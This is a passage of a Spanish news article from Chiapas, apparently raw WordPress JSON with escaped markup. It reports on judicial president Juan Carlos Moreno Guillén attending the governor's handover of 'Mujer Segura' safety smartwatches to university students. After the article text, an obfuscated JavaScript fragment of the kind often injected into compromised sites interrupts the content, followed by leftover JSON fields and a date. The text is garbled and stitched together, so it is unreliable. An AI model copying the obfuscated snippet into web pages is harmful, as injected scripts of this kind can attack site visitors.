El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, atestigu\u00f3 el acto de entrega de los relojes inteligentes del programa \u201cMujer Segura, Presiona, Activa y Alerta\u201d a estudiantes universitarias, que encabez\u00f3 el gobernador Eduardo Ram\u00edrez Aguilar y la se\u00f1ora Sof\u00eda Espinoza Abarca.<\/p>\n\n\n\n<p>Desde el Centro de Convenciones Universitario, &#8220;Dr. Manuel Velasco Su\u00e1rez&#8221;, con la anfitriona del rector de la Benem\u00e9rita Universidad Aut\u00f3noma de Chiapas, Oswaldo Chac\u00f3n Rojas, participaron la secretaria de la Mujer e Igualdad de G\u00e9nero, Dulce Mar\u00eda Rodr\u00edguez Ovando y el secretario de Seguridad del Pueblo, \u00d3scar Alberto Aparicio Avenda\u00f1o, junto con las y los representantes de las autoridades estatales, en este acto que refrenda el compromiso por la seguridad y el bienestar de las mujeres chiapanecas.<\/p>\n\n\n\n<p>En este marco, el magistrado Moreno Guill\u00e9n se congratul\u00f3 por las acciones que el gobernador Eduardo Ram\u00edrez impulsa a favor de las mujeres, y reiter\u00f3 su compromiso institucional de seguir trabajando porque la justicia sea la paz en Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>5 de noviembre del 2025.
